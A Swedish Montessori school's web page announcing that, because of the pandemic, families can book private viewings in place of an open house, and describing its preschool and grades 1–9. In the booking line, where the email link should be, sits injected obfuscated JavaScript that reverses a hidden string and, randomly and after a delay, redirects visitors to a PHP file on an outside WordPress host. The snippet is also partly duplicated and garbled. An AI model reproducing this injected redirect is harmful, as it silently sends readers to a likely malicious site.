Istället för Öppet Hus

På grund av rådande pandemi så kan vi tyvärr inte erbjuda något öppet hus i år. Ni är därför varmt välkomna att boka en privat visning av vår skola.

Vi erbjuder en lugn och harmonisk miljö, där kunskap sätts i fokus. På vår Montessoriskola utgår vi från barnets vilja att lära sig och låter barnet utvecklas i egen takt, sida vid sida med våra pedagoger och lärare.

Vi erbjuder förskola från 1-5 år, förskoleklass och grundskola 1-9 samt fritidshem.

Välkommen att boka en tid med oss via $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to:info@montessoriparlan.se”>info@montessoriparlan.se